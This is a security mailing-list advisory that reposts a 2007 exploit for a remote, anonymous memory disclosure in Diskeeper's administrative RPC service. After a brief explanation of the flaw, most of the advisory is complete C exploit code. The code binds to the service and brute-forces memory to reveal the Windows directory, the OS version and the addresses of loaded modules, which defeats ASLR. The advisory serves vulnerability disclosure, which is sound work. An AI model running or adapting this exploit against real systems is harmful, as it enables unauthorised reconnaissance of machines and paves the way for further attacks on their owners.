The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Diskeeper Remote Memory Disclosure
------------------------------------------------------------------------
SUMMARY
A vulnerability in Diskeeper allows remote users to access memory segments
via the Diskeeper service (which runs at SYSTEM privileges).
DETAILS
Exploit:
/*
Diskeeper Remote Memory Disclosure
Credit: Pravus (pravus -a-t- hush -d-o-t- com)
Greetz: Scientology for making a remotely accessible disk
defragmenter. Felix, Jenna, and Isaac.
Vulnerability Description:
This vulnerability involves a memory comparison function that is
remotely, anonymously accessible via the remote procedure call in
the Diskeeper administrative interface. Using this, an attacker
can guess / brute force memory at any address in the process;
although passing a bad pointer will cause a memory read exception
and DoS the process. Since causing a Denial of Service for
Diskeeper is of minimal consequence, this write-up will focus on
the memory reading aspect.
By making use of shared user memory at 0x7FFE0000, an attacker can
learn information, such as Windows drive, path, and version. More
importantly for a targeted attack, an attacker can also get the
name, path, version and base address of all loaded modules in the
process. This would essentially defeat address space randomization
(ASLR) in Windows Vista, since loaded modules tend to have the same
preferred address in all processes for each boot of the system.
Details:
Diskeeper introduced their administrative interface in Diskeeper 9
and continued it in Diskeeper 10 and Diskeeper 2007. For the
purpose of this vulnerability I tested in Diskeeper 9 Professional
and Diskeeper 2007 Pro Premier. (Though I believe from
documentation that the Server Editions of each and both versions in
Diskeeper 10 are equally vulnerable.)
The administrative interface, DkService.exe, runs as a system
service that is by default configured to automatically start. It
listens on TCP port 31038 and has three RPC functions available.
Calling the opcode 0x01 RPC function (MIDL below) allows a remote,
anonymous memory comparison at an attacker provided address.
Simply pass the size of the data, the data, and the address to make
use of this.
MIDL
/* opcode: 0x01, address: 0x004922F0 (address from 2007
ProPremier)* /
long sub_4922F0 (
[in] long arg_1,
[in][size_is(arg_1)] char * arg_2,
[in] hyper arg_3
);
Exploitation:
In order to exploit this, one must bind to the RPC interface, then
initiate the RPC call as many times as desired. If guessing an
intelligent value, such as a widecharacter string L"WINDOWS",
providing multiple bytes of data is optimal for speed's sake. If
attempting to brute force an address, doing so one byte at a time
is preferable so you are guessing at most 4n times instead of n^4.
In my sample exploit, I am first getting general system information
by looking at fixed locations in shared user data. I get the
Windows drive letter, the Windows directory, and the Windows OS
version (5.1=XP; 6.0=Vista; etc.) Then I brute force an address in
NTDLL.DLL from the shared user data. From this, I can jump
backwards to the start of the module, looking for the MZ header.
Knowing where the start of the module is, I can look for the .data
header to find where the data section of NTDLL.DLL is loaded.
This is where things get a little tricky. Since the loaded module
hash table is at different places in the data section depending on
the version of NTDLL.DLL, we have to search for it. Basically each
hash bucket that is empty contains a pointer to itself, so I made a
mask to place over memory that defined which buckets could be empty
vs. not, and defined that the last 6 had to be empty, because they
correspond to modules that don't start with an alphabetic character
in name. (This part could be made more effective and faster, but
for a PoC, it should work.) Once it finds memory that fits the
mask, I iterate the linked list at each of the 32 hash buckets and
read the relevant loaded module information.
I just used a #define for the IP address string, so modify it for
your target IP.
Exploit Code:
*/
//Diskeeper Remote Memory Read
//By: Pravus
#define WIN32_LEAN_AND_MEAN
#define PORT 31038
#define DELAY 50
#define _CRT_SECURE_NO_DEPRECATE
#define _USE_32BIT_TIME_T
#define servername "127.0.0.1"
#pragma comment (lib,"ws2_32")
#include <winsock2.h>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/timeb.h>
#include <time.h>
char rpcbind [] =
"\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00"
"\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
"\xb7\xf9\x09\x28\xef\xcf\x64\x41\x8c\x46\xe8\xd4\x17\x52\x2c\x1c"
"\x03\x00\x03\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
"\x2b\x10\x48\x60\x02\x00\x00\x00";
char request [] =
"\x05\x00\x00\x03\x10\x00\x00\x00\x68\x00\x00\x00\x00\x00\x00\x00"
"\x50\x00\x00\x00\x00\x00\x01\x00";
//4 byte len
//4 byte len
//dword aligned string
//pointer
//ign dword
//This function is a simple remote comparison returning true if the memory
//at loc matches value for len bytes. This is where the real
"exploitation"
//comes into play. We just send a mocked up RPC request using their
provided
//remote mem compare function.
BOOL rmemcmp(SOCKET conn, int loc, char* value, int len)
{
char buff [32768];
int w,x=0;
memset(buff, '\0', sizeof(buff));
memcpy(buff, request, sizeof(request));
x+=sizeof(request)-1;
memcpy(buff+x, &len, sizeof(len)); //len
x+=sizeof(len);
memcpy(buff+x, &len, sizeof(len)); //len
x+=sizeof(len);
memcpy(buff+x, value, len); //string
x+=len;
x+=(8-(len%8))%8; //null pad
memcpy(buff+x, &loc, sizeof(loc)); //pointer
x+=sizeof(loc);
w=0;
memcpy(buff+x, &w, sizeof(w)); //don't care
x+=sizeof(w);
w=x-0x18;
memcpy(buff+8, &x, sizeof(x));
memcpy(buff+0x10, &w, sizeof(w));
send(conn,(const char*)buff,x,0);
recv(conn,(char*)buff,2048,0);
w=*(buff+0x18);
return (BOOL)w;
}
//main function do all the calls
int main(int argc, char** argv)
{
WSADATA wsaData;
if (WSAStartup(0x202,&wsaData))
return 1;
SOCKET conn;
conn=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(conn==INVALID_SOCKET)
return 1;
unsigned long addr;
addr=inet_addr(servername);
if (addr==INADDR_NONE)
{
closesocket(conn);
return 1;
}
sockaddr_in server;
server.sin_addr.s_addr=addr;
server.sin_family=AF_INET;
server.sin_port=htons(PORT);
if(connect(conn,(struct sockaddr*)&server,sizeof(server)))
{
closesocket(conn);
return 1;
}
linger ling;
ling.l_onoff=1;
ling.l_linger=0;
char buff [32768];
char str [1024];
WCHAR wstr [1024];
unsigned char filechars [] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.\\";
unsigned int listbin, mask;
unsigned char c, *d;
int u,v,w,x,y,z,ret,ntbase,ntdata,modbase;
struct _timeb timebuffer;
timeval t;
t.tv_sec=0;
t.tv_usec=DELAY;
//send the rpc bind
send(conn,(const char*)rpcbind,sizeof(rpcbind)-1,0);
recv(conn,(char*)buff,2048,0);
//get the Windows drive letter
ret=0;
c='A';
y=1;
z=0x7FFE0030;
while ((ret==0) && (c<='Z'))
{
sprintf(str, "%c", c);
ret=rmemcmp(conn, z, str, y);
c++;
}
if (!ret)
{
printf("Could not determine drive letter.\n");
}
else
{
c--;
printf("Windows running on drive %c\n",c);
}
//get the Windows dir
z=0x7FFE0036;
wcscpy(wstr, L"WINDOWS");
y=wcslen(wstr)*2;
if (rmemcmp(conn, z, (char*)wstr, y))
{
printf("Windows directory is WINDOWS\n");
}
else
{
wcscpy(wstr, L"WINNT");
y=wcslen(wstr)*2;
if (rmemcmp(conn, z, (char*)wstr, y))
{
printf("Windows directory is WINNT\n");
}
else
{
ret=0;
y=1;
z=0x7FFE0036;
printf("Windows directory is ");
do {
d=filechars;
ret=0;
while ((ret==0) && (*d))
{
sprintf(str, "%c", *d);
ret=rmemcmp(conn, z, str,
y);
d++;
}
if (ret)
printf(str);
z+=2;
} while (ret==1);
printf("\n");
}
}
//Windows version
printf("Windows version is ");
ret=0;
c='\x00';
y=1;
z=0x7FFE026C;
while (ret==0)
{
sprintf(str, "%c", c);
ret=rmemcmp(conn, z, str, y);
c++;
}
c--;
printf("%u.",c);
ret=0;
c='\x00';
y=1;
z+=4;
while (ret==0)
{
sprintf(str, "%c", c);
ret=rmemcmp(conn, z, str, y);
c++;
}
c--;
printf("%u\n",c);
//find the NTDLL.DLL base address
x=0;
y=1;
for (z=0x7FFE0303; z>=0x7FFE0300; z--)
{
ret=0;
c='\x00';
while (ret==0)
{
sprintf(str, "%c", c);
ret=rmemcmp(conn, z, str, y);
c++;
}
c--;
x=x<<8;
x+=c;
} // printf ("Beginning search for NTDLL.DLL at 0x%x\n",x);
z=x&0xFFFF0000;
strcpy(str, "MZ");
y=2;
ret=0;
while (ret==0)
{
ret=rmemcmp(conn, z, str, y);
z-=0x10000;
}
z+=0x10000;
ntbase=z;
printf ("NTDLL.DLL is based at 0x%x\n",z);
//Look for .data section and then the module hash table in NTDLL
(LDR_MODULE)
z+=0x160; //to skip over some of DOS header + PE header + .text
section
strcpy(str, ".data");
y=5;
ret=0;
while (ret==0)
{
ret=rmemcmp(conn, z, str, y);
z+=4;
}
z+=8; //start of .data + 0x0c
y=1;
x=0;
for (w=z+3; w>=z; w--)
{
ret=0;
c='\x00';
while (ret==0)
{
sprintf(str, "%c", c);
ret=rmemcmp(conn, w, str, y);
c++;
}
c--;
x=x<<8;
x+=c;
}
z=ntdata=x+ntbase;
printf ("NTDLL data section located at 0x%x\n",z);
//mask - 0=can't be empty hash, 1=can be empty; 01001101 11010000
10000101 11111111
mask=0x4DD085FF;
listbin=0;
y=4;
do
{
ret=rmemcmp(conn, z, (char*)&z, y);
listbin=(listbin<<1)+ret;
ret=rmemcmp(conn, z+4, (char*)&z, y);
listbin=listbin&(~(!ret));
z+=8;
} while
((z<ntdata+256)||((listbin&mask)!=listbin)||((listbin&0x3F)!=0x3F));
//note - if this isn't working, may need to tweak the last while
clause...
//if a DLL were being loaded/injected that didn't start with an
alpha character,
//these buckets wouldn't be empty
modbase=z-256;
printf("Found loaded modules list at 0x%x\n",modbase);
_ftime( &timebuffer );
//lets get the modules
for (z=modbase;z<modbase+256;z+=8)
{
if (((listbin>>(31-((z-modbase)/8)))&1)==0)
{
v=z;
do {
x=0;
y=1;
for (w=v+3; w>=v; w--)
{
ret=0;
c='\x00';
while (ret==0)
{
sprintf(str, "%c", c);
ret=rmemcmp(conn, w, str,
y);
c++;
}
c--;
x=x<<8;
x+=c;
}
if (x==z) //if the next pointer points
back to the module list, we're done
break;
//get address of module name
v=x-12;
u=0;
y=1;
for (w=v+3; w>=v; w--)
{
ret=0;
c='\x00';
while (ret==0)
{
sprintf(str, "%c", c);
ret=rmemcmp(conn, w, str,
y);
c++;
}
c--;
u=u<<8;
u+=c;
}
//get the module name
ret=0;
y=1;
printf("Module ");
do {
d=filechars;
ret=0;
while ((ret==0) && (*d))
{
sprintf(str, "%c", *d);
ret=rmemcmp(conn, u, str,
y);
d++;
}
if (ret)
printf(str);
u+=2;
} while (ret==1);
printf(" is loaded at ");
//get the module address
v=x-36;
u=0;
y=1;
for (w=v+3; w>=v; w--)
{
ret=0;
c='\x00';
while (ret==0)
{
sprintf(str, "%c", c);
ret=rmemcmp(conn, w, str,
y);
c++;
}
c--;
u=u<<8;
u+=c;
}
printf("0x%x\n",u);
//get the module timestamp
v=x+8;
u=0;
y=1;
for (w=v+3; w>=v; w--)
{
ret=0;
c='\x00';
while (ret==0)
{
sprintf(str, "%c", c);
ret=rmemcmp(conn, w, str,
y);
c++;
}
c--;
u=u<<8;
u+=c;
}
memset(str, '\0', sizeof(str));
timebuffer.time=u;
ctime_s(str, 26, &(timebuffer.time));
printf("Module time is %.24s (0x%x)\n",
str, u);
v=x;
} while (v!=z);
}
}
system("pause");
WSACleanup();
return 0;
}
// milw0rm.com [2007-08-17]
ADDITIONAL INFORMATION
The information has been provided by <mailto:pravus@hush.com> Pravus.
The original article can be found at:
<http://www.milw0rm.com/exploits/4292>
http://www.milw0rm.com/exploits/4292
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
